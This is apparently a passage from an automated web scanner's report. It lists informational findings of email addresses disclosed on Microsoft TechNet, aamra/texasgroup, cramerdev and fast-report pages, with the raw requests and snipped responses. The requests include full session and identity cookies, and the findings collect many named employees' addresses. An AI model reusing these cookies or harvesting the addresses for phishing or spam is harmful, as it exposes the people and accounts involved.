00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; Sto.UserLocale=en-us; ADS=SN=175A21EF; WT_NVR=0=/:1=en-us:2=en-us/security|en-us/subscriptions|en-us/evalcenter|en-us/magazine:3=en-us/subscriptions/downloads; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301092926436:ss=1301092848759; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi]00019@E0I02h9@E0I; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:41:31 GMT
Content-Length: 46428


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head"><link
...[SNIP]...
<a id="ctl00_MTContentSelector1_mainContentContainer_ctl00_MTContentSelector1_mainContentContainer_ctl03" href="mailto:llow@1105media.com" onclick="javascript:Track('ctl00_MTContentSelector1_mainContentContainer_ctl00|_MTContentSelector1_mainContentContainer_ctl03',this);">
...[SNIP]...
<a id="ctl00_MTContentSelector1_mainContentContainer_ctl09" href="mailto:romi@thekkmgroup.com" onclick="javascript:Track('ctl00_MTContentSelector1_mainContentContainer_ctl00|ctl00_MTContentSelector1_mainContentContainer_ctl09',this);">
...[SNIP]...
<a id="ctl00_MTContentSelector1_mainContentContainer_ctl12" href="Gary.Olsen@hp.com" onclick="javascript:Track('ctl00_MTContentSelector1_mainContentContainer_ctl00|ctl00_MTContentSelector1_mainContentContainer_ctl12',this);">
...[SNIP]...
<a id="ctl00_MTContentSelector1_mainContentContainer_ctl21" href="mailto:alan.maddison@microsoft.com" onclick="javascript:Track('ctl00_MTContentSelector1_mainContentContainer_ctl00|ctl00_MTContentSelector1_mainContentContainer_ctl21',this);">
...[SNIP]...
<a id="ctl00_MTContentSelector1_mainContentContainer_ctl24" href="mailto:paul@expertitsolutions.com.au" onclick="javascript:Track('ctl00_MTContentSelector1_mainContentContainer_ctl00|ctl00_MTContentSelector1_mainContentContainer_ctl24',this);">
...[SNIP]...
23.32. http://technet.microsoft.com/en-us/security/cc261624  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technet.microsoft.com
Path:   /en-us/security/cc261624

Issue detail

The following email address was disclosed in the response:

Request

GET /en-us/security/cc261624 HTTP/1.1
Host: technet.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; BPFC=:en:; CommunityServer-UserCookie2101=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Tue%2c+01+Mar+2011+15%3a49%3a43+GMT; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; WT_NVR=0=/:1=en-us:2=en-us/security|en-us/subscriptions|en-us/evalcenter|en-us/magazine:3=en-us/subscriptions/downloads; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi]0001@@E0I02h@@E0I; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301092958107:ss=1301092848759; Sto.UserLocale=en-us; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 16685
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:42:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<a href="mailto:secure@microsoft.com">secure@microsoft.com</a>
...[SNIP]...
23.33. http://technet.microsoft.com/en-us/security/ff852094.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technet.microsoft.com
Path:   /en-us/security/ff852094.aspx

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en-us/security/ff852094.aspx HTTP/1.1
Host: technet.microsoft.com
Proxy-Connection: keep-alive
Referer: http://www.microsoft.com/technet/security/bulletin/alertus.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=688642bf9d16e14b952901540959fda0&HASH=bf42&LV=20112&V=3; MUID=FA3AE6176FAC4414AD6FC26C726B4B15; BPFC=:en:; CommunityServer-UserCookie2101=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Tue%2c+01+Mar+2011+15%3a49%3a43+GMT; __unam=289c965-12e721b8405-5ba8ac9c-2; _opt_vi_LECG2UZC=70FF57B5-618B-4C89-A6E0-AEEFB08346CB; R=200027254-3/8/2011 14:53:52; _opt_vi_06F86FDK=742B89EE-F086-4032-9920-451B209CBC09; msdn=L=1033; WT_NVR_RU=0=technet|msdn:1=:2=; MSID=Microsoft.CreationDate=02/15/2011 21:42:53&Microsoft.LastVisitDate=03/26/2011 00:57:21&Microsoft.VisitStartDate=03/26/2011 00:57:21&Microsoft.CookieId=cdefcdbc-cd58-426e-a2b9-6d4d032c5554&Microsoft.TokenId=0242265b-d73d-484f-a494-b6344e553cef&Microsoft.NumberOfVisits=23&Microsoft.IdentityToken=plYFWp/Sav9RboFYJDENknWK0M3HKGRxExSO3ZthrhvxePoaRD543/4jCDtpABDhXvGu6hYw2p7w2OmmFcnnIATCsqP2cDLpwOaak2MSqpcwaZgium6WkbxRI/3lfq0Gws5gcoTO900VpbrWwnZWkk0h7DvuOUy8fvvcOIGUata8oggRE3IuQrAHBEdOSC/VqwuxZuA8KPU+oVMW2WeVUbt/xABiD8cXjH/eMrCCuxuZz35IbR8vQoULMMLVcABNmxQVsXvFb9OdB+JXJYi7RA0KQqL3iTcg1W/EF1rgR0gVqEcUWJN4qVllIbUGiU8N0wicUcjkNMpnYKw6LUumclx6R3aZQ45I51JtrotJDDVuP0DWwWnW13onH24nmUTXBZBOheXFYzynksZs2l8NLvKjXhpdbbc9j9a1dbb4rMVVXHpY30MRfbCM47a1gnmlVVOW+qUz6A30GY5CvEOLiGN25+nvYeNS7r4egZVUUXGtCCTuwHLaMByKYLNBjzcYx+KFLbPw3vUTZZB9kkHuQTlG3YCkF73XUqeC+mr8Xi8=&Microsoft.MicrosoftId=0189-2123-7087-5274&Microsoft.CookieFirstVisit=1; _opt_vi_DANG4OLL=49D92CA5-D4F7-41F0-8DD6-1130EED19BA3; _opt_vt_DANG4OLL=202FA024DB; ADS=SN=175A21EF; WT_NVR=0=/:1=en-us:2=en-us/security|en-us/subscriptions|en-us/evalcenter|en-us/magazine:3=en-us/subscriptions/downloads; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1301103723737%7D%2C%22lastinvited%22%3A1301103723737%2C%22userid%22%3A%2213011037237379667073420714586%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=2a3c4c9fe97247d48c9a5163057b9a69; A=I&I=AxUFAAAAAAAABwAADIe+FnxFI293k92k7DipMA!!&CS=126gi]0001@@E0I02h@@E0I; omniID=ue; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-1295665472.30133593:lv=1301092958107:ss=1301092848759; Sto.UserLocale=en-us

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 17100
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 26 Mar 2011 01:42:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<a href="mailto:secure@microsoft.com">secure@microsoft.com</a>
...[SNIP]...
<a href="mailto:secure@microsoft.com">secure@microsoft.com</a>
...[SNIP]...
<a href="mailto:piracy@microsoft.com">piracy@microsoft.com</a>
...[SNIP]...
<a href="mailto:avsubmit@submit.microsoft.com">avsubmit@submit.microsoft.com</a>
...[SNIP]...
<a href="mailto:windefend@submit.microsoft.com">windefend@submit.microsoft.com</a>
...[SNIP]...
23.34. http://texasgroup.net/contact.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://texasgroup.net
Path:   /contact.html

Issue detail

The following email address was disclosed in the response:

Request

GET /contact.html HTTP/1.1
Host: texasgroup.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Mar 2011 22:58:17 GMT
Server: Apache
Last-Modified: Sun, 18 Jul 2010 12:00:21 GMT
ETag: "425a-4490-4c42ecd5"
Accept-Ranges: bytes
Content-Length: 17552
Connection: close
Content-Type: text/html

<html>

<head>
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-12
...[SNIP]...
<a href="mailto:info@aamra.com.bd">
...[SNIP]...
<b>info@aamra.com.bd</b>
...[SNIP]...
23.35. http://texasgroup.net/management.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://texasgroup.net
Path:   /management.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /management.html HTTP/1.1
Host: texasgroup.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Mar 2011 22:58:14 GMT
Server: Apache
Last-Modified: Tue, 17 Aug 2010 08:19:54 GMT
ETag: "4261-8e90-4c6a462a"
Accept-Ranges: bytes
Content-Length: 36496
Connection: close
Content-Type: text/html

<html>

<head>
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windo
...[SNIP]...
<a href="mailto:faruque.ahmed@aamra.com.bd">
...[SNIP]...
<font
color=#666666 style="font-size: 9pt">faruque.ahmed@aamra.com.bd</font>
...[SNIP]...
<a
style="FONT-WEIGHT: 700; COLOR: #666666; "
href="mailto:farhad.ahmed@aamra.com.bd">
...[SNIP]...
<font style="font-size: 9pt">farhad.ahmed@aamra.com.bd</font>
...[SNIP]...
<a
style="FONT-WEIGHT: 700; COLOR: #666666; "
href="mailto:zahrul.bakht@aamra.com.bd">
...[SNIP]...
<font style="font-size: 9pt">zahrul.bakht@aamra.com.bd</font>
...[SNIP]...
<a style="FONT-WEIGHT: 700; COLOR: #666666; " href="mailto:priyabrata.chowdhury@aamra.com.bd"> priyabrata.chowdhury@aamra.com.bd</a>
...[SNIP]...
<a style="FONT-WEIGHT: 700; COLOR: #666666; " href="mailto:akm.zaman@aamra.com.bd">
akm.zaman@aamra.com.bd</a>
...[SNIP]...
<a
style="FONT-WEIGHT: 700; COLOR: #666666; "
href="mailto:sohel.ahmed@aamra.com.bd">
...[SNIP]...
<font style="font-size: 9pt">sohel.ahmed@aamra.com.bd</a>
...[SNIP]...
<a
style="FONT-WEIGHT: 700; COLOR: #666666; "
href="mailto:sanower.hossain@aamra.com.bd ">
sanower.hossain@aamra.com.bd </a>
...[SNIP]...
<a style="FONT-WEIGHT: 700; COLOR: #666666; " href="mailto:mosiur.rahman@aamra.com.bd">
mosiur.rahman@aamra.com.bd</a><a
style="FONT-WEIGHT: 700; COLOR: #666666; "
href="mailto:sonia.kabir@aamra.com.bd ">
...[SNIP]...
<a href="mailto:sharful.alam@aamra.com.bd">
...[SNIP]...
<font face="Tahoma" style="font-size: 9pt" color="#666666">
sharful.alam@aamra.com.bd</font>
...[SNIP]...
<a href="mailto:sharful.alam@aamra.com.bd">
...[SNIP]...
<font color="#666666">sharful.alam@aamra.com.bd</font>
...[SNIP]...
<a
style="FONT-WEIGHT: 700; COLOR: #666666; "
href="mailto:kamal.ahm@aamra.com.bd ">kamal.ahm@aamra.com.bd </a>
...[SNIP]...
<a
href="mailto:dolan.chowdhury@aamra.com.bd ">
...[SNIP]...
<b>dolan.chowdhury@aamra.com.bd </b>
...[SNIP]...
<a style="FONT-WEIGHT: 700; COLOR: #666666; " href="mailto:mosiur.rahman@aamra.com.bd">mosiur.rahman@aamra.com.bd</a><a style="FONT-WEIGHT: 700; COLOR: #666666; " href="mailto:monzurul.karim@aamra.com.bd"></a><a
style="FONT-WEIGHT: 700; COLOR: #666666; "
href="mailto:sonia.kabir@aamra.com.bd ">
...[SNIP]...
<a href="mailto:sharful.alam@aamra.com.bd">
...[SNIP]...
<font face="Tahoma" style="font-size: 9pt" color="#666666">
sharful.alam@aamra.com.bd</font>
...[SNIP]...
<a
style="FONT-WEIGHT: 700; COLOR: #666666; "
href="mailto:meher.zahed@aamra.com.bd">
meher.zahed@aamra.com.bd</a>
...[SNIP]...
<a style="FONT-WEIGHT: 700; COLOR: #666666; " href="mailto:tarique.ashraf@aamra.com.bd">
tarique.ashraf@aamra.com.bd</a>
...[SNIP]...
<a style="FONT-WEIGHT: 700; COLOR: #666666; " href="mailto:humaun.kabir@aamra.com.bd">
humaun.kabir@aamra.com.bd</a>
...[SNIP]...
23.36. http://texasgroup.net/teml_pro.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://texasgroup.net
Path:   /teml_pro.html

Issue detail

The following email address was disclosed in the response:

Request

GET /teml_pro.html HTTP/1.1
Host: texasgroup.net
Proxy-Connection: keep-alive
Referer: http://texasgroup.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Mar 2011 22:59:09 GMT
Server: Apache
Last-Modified: Fri, 30 Jul 2010 16:58:33 GMT
ETag: "4268-4943-4c5304b9"
Accept-Ranges: bytes
Content-Length: 18755
Connection: close
Content-Type: text/html

<html>

<head>
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windo
...[SNIP]...
<a href="mailto:info@aamra.com.bd">
...[SNIP]...
<span style="text-decoration: none">
                           info@aamra.com.bd</span>
...[SNIP]...
23.37. http://www.aamraresources.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aamraresources.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.aamraresources.com
Proxy-Connection: keep-alive
Referer: http://texasgroup.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 28 Mar 2011 00:51:51 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.10 with Suhosin-Patch mod_ssl/2.8.31 OpenSSL/0.9.8e
Last-Modified: Thu, 25 Mar 2010 03:59:53 GMT
ETag: "23c2198-3200-4baadfb9"
Accept-Ranges: bytes
Content-Length: 12800
Content-Type: text/html

<html>


<head>

<title>::::Welcome ::::</title>


<STYLE>


A:link {

   FONT-SIZE: 12px; COLOR: #000000; FONT-FAMILY: Verdana; FONT-WEIGHT: none; TEXT-DECORATION: none

}

A:active {

   FONT-SIZE:
...[SNIP]...
<a href="mailto:info.resources@aamra.com.bd">
...[SNIP]...
<font color="#0078B3">info.resources@aamra.com.bd</font>
...[SNIP]...
23.38. http://www.cramerdev.com/get-in-touch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cramerdev.com
Path:   /get-in-touch

Issue detail

The following email addresses were disclosed in the response:

Request

GET /get-in-touch HTTP/1.1
Host: www.cramerdev.com
Proxy-Connection: keep-alive
Referer: http://www.cramerdev.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MarkupFactory%5FInstallation%5FHandle=cramerdev; ASPSESSIONIDAAACSQCR=FFBDMJECFMGHLGCDAMPIOKHD; __utmz=257688281.1301081104.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Arcturus%2ESession%2ECookie=; Arcturus%2ESession%2ECookie%2EValue=; __utma=257688281.681488014.1301081104.1301081104.1301081104.1; __utmc=257688281; __utmb=257688281.4.10.1301081104

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: Arcturus%2ESession%2ECookie%2EValue=; path=/
Set-Cookie: Arcturus%2ESession%2ECookie=; path=/
X-Powered-By: Markup Factory
Date: Fri, 25 Mar 2011 19:25:13 GMT
Content-Length: 7574

<!DOCTYPE html>

<html>

<head>

<meta http-equiv="content-type" content="text/html; charset=utf-8" />

<link rel="stylesheet" type="text/css" media="screen" href="/assets/cramerdev/960.css" />

...[SNIP]...
<a href="mailto:connect@cramerdev.com">connect@cramerdev.com</a>
...[SNIP]...
<a href="mailto:support@cramerdev.com">support@cramerdev.com</a>
...[SNIP]...
<a href="mailto:serversupport@cramerit.com">serversupport@cramerit.com</a>
...[SNIP]...
23.39. http://www.cramerdev.com/get-in-touch/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cramerdev.com
Path:   /get-in-touch/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /get-in-touch/ HTTP/1.1
Host: www.cramerdev.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MarkupFactory%5FInstallation%5FHandle=cramerdev; ASPSESSIONIDAAACSQCR=FFBDMJECFMGHLGCDAMPIOKHD; __utmz=257688281.1301081104.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=257688281.681488014.1301081104.1301081104.1301081104.1; __utmc=257688281; __utmb=257688281.2.10.1301081104; Arcturus%2ESession%2ECookie=; Arcturus%2ESession%2ECookie%2EValue=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: Arcturus%2ESession%2ECookie%2EValue=; path=/
Set-Cookie: Arcturus%2ESession%2ECookie=; path=/
X-Powered-By: Markup Factory
Date: Fri, 25 Mar 2011 19:25:13 GMT
Content-Length: 7574

<!DOCTYPE html>

<html>

<head>

<meta http-equiv="content-type" content="text/html; charset=utf-8" />

<link rel="stylesheet" type="text/css" media="screen" href="/assets/cramerdev/960.css" />

...[SNIP]...
<a href="mailto:connect@cramerdev.com">connect@cramerdev.com</a>
...[SNIP]...
<a href="mailto:support@cramerdev.com">support@cramerdev.com</a>
...[SNIP]...
<a href="mailto:serversupport@cramerit.com">serversupport@cramerit.com</a>
...[SNIP]...
23.40. http://www.fast-report.com/en/buy/order-FASTREPORT.NET.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fast-report.com
Path:   /en/buy/order-FASTREPORT.NET.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /en/buy/order-FASTREPORT.NET.html HTTP/1.1
Host: www.fast-report.com
Proxy-Connection: keep-alive
Referer: http://www.fast-report.com/en/buy/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2F; PHPSESSID=76cc7f5b0df4ee756aa4259ff29089dc; BITRIX_SM_GUEST_ID=4619667; BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A19

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 11:41:29 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Set-Cookie: trl_ref=http%3A%2F%2Fwww.fast-report.com%2Fen%2Fbuy%2F; expires=Tue, 05-Apr-2011 11:41:29 GMT
P3P: policyref="/bitrix/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
X-Powered-CMS: Bitrix Site Manager (f6aa359040bb2b476191c7302c607251)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: BITRIX_SM_GUEST_ID=4619667; expires=Tue, 20-Mar-2012 11:41:31 GMT; path=/
Set-Cookie: BITRIX_SM_LAST_VISIT=26.03.2011+06%3A41%3A31; expires=Tue, 20-Mar-2012 11:41:31 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 29289

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.fast-report.com/bitrix/rss.php?ID=18&
...[SNIP]...
<a href="mailto:upgrade@fast-report.com">
...[SNIP]...
<a href="mailto:upgrade@fast-report.com?subject=Discount">upgrade@fast-report.com</a>
...[SNIP]...
<a href="mailto:sales@fast-report.com" class="textlink">sales@fast-report.com</a>
...[SNIP]...
